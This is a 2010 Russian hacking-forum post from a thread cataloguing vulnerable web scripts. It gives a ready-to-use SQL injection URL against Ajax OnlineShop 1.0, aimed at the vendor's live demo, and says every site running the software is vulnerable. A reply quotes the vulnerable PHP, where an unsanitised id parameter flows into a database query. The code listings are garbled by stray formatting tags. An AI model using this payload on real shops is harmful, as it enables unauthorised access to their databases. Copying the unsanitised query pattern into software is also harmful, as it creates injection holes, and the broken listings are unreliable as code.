Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #435  
Старый 14.11.2010, 21:17
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию
Цитата:
Сообщение от 547  
Ajax OnlineShop 1.0
SQL Injection
оффсайт:
Код:
http://www.ajax-onlineshop.de/demo/index.php?id=4997+UNION+SELECT+1,2,3,version%28%29,5,6,7,8%20--+#seo_loaded%28-4997%29


параметр index.php?id= прийдется дописывать самому из за функции:document.URL.split
PHP код:
[COLOR="#000000"]// if get id in url but no #

 if ( ([COLOR="#0000BB"][/COLOR] != 0) && (![COLOR="#0000BB"][/COLOR]) && (document.URL.search(/#.+/) == -1) ) {

 wohinJS = 'reload';

 var start_name = document.URL.split ('?id=');

 var hist_event_name = start_name[0] + "(" + start_name[1] + ")"; // generate history-event-name

 addHistoryEvent('seo_loaded('+ start_name[1] +')', start_name[1]); // load requested page

 }

 else {

 var start_name = document.URL.split ('#');

 [COLOR="#0000BB"]

[/COLOR] if (start_name[1]) { // exist history-ID in url...

 wohinJS = 'reload';

 start_name = start_name[1].split ('('); // ...yes, split the name

 var start_id = filterZahl(start_name[1]); // extract the id // del wenn sicher: filterZahl(start_url)

 //$('log').innerHTML = start_name[0] + " - " + start_id; // testing

 var hist_event_name = start_name[0] + "(" + start_id + ")"; // generate history-event-name

 addHistoryEvent(hist_event_name, start_id); // load requested page

 }

 else { // ...no, then load shop-startpage

 [COLOR="#0000BB"][/COLOR][/COLOR
уязвимы все сайты,их достаточно много
547, не тот код уязвим.

Так правильнее будет.

--->index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ( (isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]])) && ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) ) {

[/COLOR][COLOR="#0000BB"]$startpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"false"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];

}

else {

[/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_startpage_link[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$startpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"true"[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$seo_infos[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]seo_get_site_infos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id_page[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR
--->config.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]get_prod_comments[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$new_added[/COLOR][COLOR="#007700"]) {

global[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"backgroundcolor: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_maindivs'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]gen_seitenzahlarr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"aong_shop_art_comments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodID =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]AND del='N'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]];

}

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]sql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM aong_shop_art_comments "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"where_state"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" ORDER BY ID DESC[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$limit[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$page_prodcomments_amount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]count_rows[/COLOR][COLOR="#007700"]();

if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]gen_seitenzahlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"seiten"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"oben"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=

[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"])) {



if ([/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"background-color: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_maindivs'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];

}

else{

[/COLOR][COLOR="#0000BB"]$backgr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"background-color: #"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"row_colors"[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'backgr_div_weich'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]";"[/COLOR][COLOR="#007700"];

}



if ( ([/COLOR][COLOR="#0000BB"]$new_added[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&& ([/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) ){

[/COLOR][COLOR="#0000BB"]$new_added_addon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]" color: #2A5206;"[/COLOR][COLOR="#007700"];

}

else {

[/COLOR][COLOR="#0000BB"]$new_added_addon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}



[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"

"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"name"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"am "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"d.m.Y"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" um "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"H:i"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" Uhr





vor "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]intervall[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()-[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"time"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"







"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"txt"[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]"

"[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$backgr_zaehler[/COLOR][COLOR="#007700"]++;

}

[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]gen_seitenzahlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"proseite"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"seiten"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$seitenzahl_arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"start"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"unten"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"prodcomments"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$prod_id[/COLOR][COLOR="#007700"]);

}

return[/COLOR][COLOR="#0000BB"]$outputText[/COLOR][COLOR="#007700"];

}

....

[/COLOR][/COLOR
https://rdot.org/forum/showpost.php?p=9338&postcount=5
 
Ответить с цитированием